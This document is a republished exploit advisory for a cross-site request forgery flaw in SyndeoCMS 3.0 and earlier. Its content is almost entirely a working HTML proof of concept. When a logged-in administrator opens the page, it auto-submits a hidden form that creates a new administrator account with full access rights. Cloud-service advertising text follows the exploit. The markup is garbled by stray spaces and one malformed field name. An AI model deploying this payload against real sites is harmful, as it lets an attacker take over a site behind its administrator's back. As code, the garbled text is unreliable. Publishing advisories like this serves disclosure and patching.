Title: SyndeoCMS <= 3.0 CSRF Vulnerability
By Ivano Binetti (http://ivanobinetti.com)
Program Development Site: http://www.syndeocms.org/
: Http://sourceforge.net/projects/syndeocms
Affected Versions: 3.0 and earlier
Test System Platform: Debian Squeeze (6.0)
+ -------------- + [Add an administrator account by Ivano Binetti] --------------------- +
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> I'm adding ADMIN account </H2>
<Form method = "POST" name = "form0" action = "http://www.bkjia.com/syndeocms/starnet/index. php? Option = configuration & suboption = users & modoption = save_user & user_id = ">
<Input type = "hidden" name = "fullname" value = "new_admin"/>
<Input type = "hidden" name = "username" value = "new_admin"/>
<Input type = "hidden" name = "password" value = "password"/>
<Input type = "hidden" name = "email" value = "admin@admin.com"/>
<Input type = "hidden" name = "editor" value = "2"/>
<Input type = "hidden" name = "sections" value = ""/>
<Input type = "hidden" name = "access_1" value = "1"/>
<Input type = "hidden" name = "access_2" value = "1"/>
<Input type = "hidden" name = "access_13" value = "1"/>
<Input type = "hidden" name = "access_3" value = "1"/>
<Input type = "hidden" name = "access_4" value = "1"/>
<Input type = "hidden" name = "access_5" value = "1"/>
<Input type = "hidden" name = "access_6" value = "1"/>
<Input type = "hidden" name = "access_7" value = "1"/>
<Input type = "hidden" name = "access_8" value = "1"/>
<Input type = "hidden" name = "access_9" value = "1"/>
<Input type = "hidden" name = "access_16" value = "1"/>
<Input type = "hidden" name = "access_10" value = "1"/>
<Input type = "hidden" name = "access_11" value = "1"/>
<Input type = "hidden" name = "access_12" value = "1"/>
<Input type = "hidden" name = "access_14" value = "1"/>
<Input type = "hidden" name = "access_15" value = "1"/>
<Input type = "hidden" name = "m_access % 5B6% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B8% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B10% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B11% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B0% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B1% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B13% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B12% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B14% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B15% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B7% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B19% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B2% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5f8% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B17% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B18% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B3% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B4% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B9% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B5% 5D" value = "1"/>
</Form>
</Body>
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
